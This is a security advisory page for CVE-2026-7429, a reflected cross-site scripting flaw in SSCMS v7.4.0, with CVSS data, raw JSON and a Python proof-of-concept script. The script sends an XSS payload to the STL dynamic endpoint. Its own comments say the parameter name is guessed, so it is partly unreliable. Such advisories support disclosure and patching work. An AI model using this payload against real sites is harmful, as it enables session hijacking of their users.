Security Vulnerability Report
CVE-2026-7429 CVSS 4.6 MEDIUM

CVE-2026-7429

Published: 2026-04-30 20:16:25
Last Modified: 2026-05-01 15:28:46

Description

SSCMS v7.4.0 contains a reflected cross-site scripting vulnerability in the STL processing endpoint that allows attackers to execute arbitrary JavaScript by crafting malicious STL template payloads that are decrypted and returned without proper sanitization. Attackers can exploit improper output encoding in the /api/stl/actions/dynamic endpoint to inject executable JavaScript into JSON responses, leading to session hijacking, phishing attacks, and unauthorized actions performed on behalf of users.

CVSS Details

CVSS Score: 4.6
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

SSCMS v7.4.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Exploit Title: SSCMS v7.4.0 Reflected XSS via STL Processing
# Date: 2026-04-30
# Vendor: SSCMS
# Version: v7.4.0
# CVE: CVE-2026-7429

import requests
import urllib.parse


def trigger_xss(target_url):
    """
    This script demonstrates the Reflected XSS vulnerability in SSCMS.
    It sends a malicious payload to the /api/stl/actions/dynamic endpoint.
    """
    # The endpoint vulnerable to XSS
    endpoint = f"{target_url}/api/stl/actions/dynamic"

    # Malicious JavaScript payload
    # In a real scenario, this might be encoded/encrypted depending on how the STL payload is processed
    xss_payload = '<img src=x onerror=alert(1)>'

    # Construct the request (Assuming parameter name based on dynamic endpoint behavior)
    params = {
        "template": xss_payload
    }

    try:
        response = requests.get(endpoint, params=params, timeout=10)

        print(f"[+] Request sent to: {endpoint}")
        print(f"[+] Status Code: {response.status_code}")

        # Check if the payload is reflected unescaped in the response
        if xss_payload in response.text:
            print("[+] Vulnerability Confirmed! Payload was reflected without sanitization.")
            print(f"[+] Response Snippet: {response.text[:200]}...")
        else:
            print("[-] Payload not found in response or sanitized.")

    except requests.exceptions.RequestException as e:
        print(f"[-] An error occurred: {e}")


if __name__ == "__main__":
    # Replace with the actual target URL
    target = "http://localhost:5000"
    trigger_xss(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-7429", "sourceIdentifier": "[email protected]", "published": "2026-04-30T20:16:24.997", "lastModified": "2026-05-01T15:28:46.093", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "SSCMS v7.4.0 contains a reflected cross-site scripting vulnerability in the STL processing endpoint that allows attackers to execute arbitrary JavaScript by crafting malicious STL template payloads that are decrypted and returned without proper sanitization. Attackers can exploit improper output encoding in the /api/stl/actions/dynamic endpoint to inject executable JavaScript into JSON responses, leading to session hijacking, phishing attacks, and unauthorized actions performed on behalf of users."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": 
"NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/siteserver/cms", "source": "[email protected]"}, {"url": "https://github.com/siteserver/cms/issues/3892", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/sscms-reflected-cross-site-scripting-via-stl-processing", "source": "[email protected]"}, {"url": "https://github.com/siteserver/cms/issues/3892", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}